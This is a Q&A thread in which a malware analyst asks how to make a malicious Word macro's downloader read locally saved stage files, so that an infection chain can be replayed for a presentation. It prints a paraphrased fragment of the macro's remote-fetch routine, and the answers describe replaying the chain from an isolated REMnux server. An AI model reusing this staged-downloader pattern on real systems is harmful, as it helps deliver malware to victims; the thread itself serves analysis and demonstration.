# How do I modify a word macro .response to use a local file instead?

Tags: vba

I'm trying to preserve a malicious macro enabled document infection chain for a presentation. Since the URLs tend to die off rather quickly, I've saved all the files locally, and am trying to modify the macro code to use the local files instead of the response objects based on the URLs, and I'm encountering some issues.

The original code looks something like this (I made up some function and variable names that make a little more sense than the obfuscated garbage I've been dealing with, but the names may not be accurate to their functions)

```
CONT = Module2.OpenURL("http://malicioustextfile.txt")
Public Function OpenURL(URL As String)
  Set fileObject = CreateObject("MSXML2.ServerXMLHTTP")
  fileObject.Open GET, URL
  fileObject.Send ( VariableIcantRembmer )
  AAHQJD = ThisDocument.FileProcessFunction(fileObject)

Public Function FileProcessFunction(a As Object)
  FileProcessFunction = (a.responsetext)
End Function
```

And I've modified it to look more like this

```
CONT = Module2.OpenURL("C:\localfile.txt")
Public Function OpenURL(URL As String)
  Set fso = CreateObject("Scripting.FileSystemObject")
  Set fileObject = fso.OpenTextFile(URL)
  AAHQJD = ThisDocument.FileProcessFunction(fileObject)

Public Function FileProcessFunction(a As Object)
  Do Until a.AtEndOfStream
    FileProcessFunction = FileProcessFunction + a.readline
  Loop
End Function
```

But this causes an overflow later in the program, and doesn't preserve the newlines of the file. Before I just had it doing `FileProcessFunction = a.readline`, but that was clearly only returning the last line. I don't know if I need character returns (I think I do), and the FileProcessFunction I'm fairly certain is also used to get an `.exe` file, which won't work with `a.readline`, I'm pretty sure. The last time I stepped through it, all it pulled from the local `.exe` was the MZ header, and nothing else.

How can I process the local file objects in a way that will properly mimic the a.responsetext property on a URL request?

Answer (score 0):

Not sure what you're really looking for...

```
Public Function FileProcessFunction(a As Object)  
    FileProcessFunction = a.readall()  
End Function
```

Comment: As I understand it, .readall() won't work on the .exe file... It chokes on non-ASCII or Unicode characters. After sleeping on it, I think it may be easier to set up a SimpeHTTPServer on the host or another VM with Python and pull them that way, rather than trying to modify the macro code to allow local files.

Answer (score 0):

I figured out what the problem was. I'm relatively sure what I was trying to do would have actually worked, but I was pointing the Macro to the .exe file instead of the the text file with the download link for said .exe file. The macro was expecting the text file with a link.

The fix I implemented instead of trying to use the local files, was to use a Remnux VM on the host only network hosting the files with python -m SimpleHTTPServer. Then I'd simply set a breakpoint for when the objects were created, and manipulate the locals to point to the files on my Remnux machine rather than the URIs it was actually coded for. Also, set the link in the text file to the Remnux machine, instead of dropbox. Worked like a charm.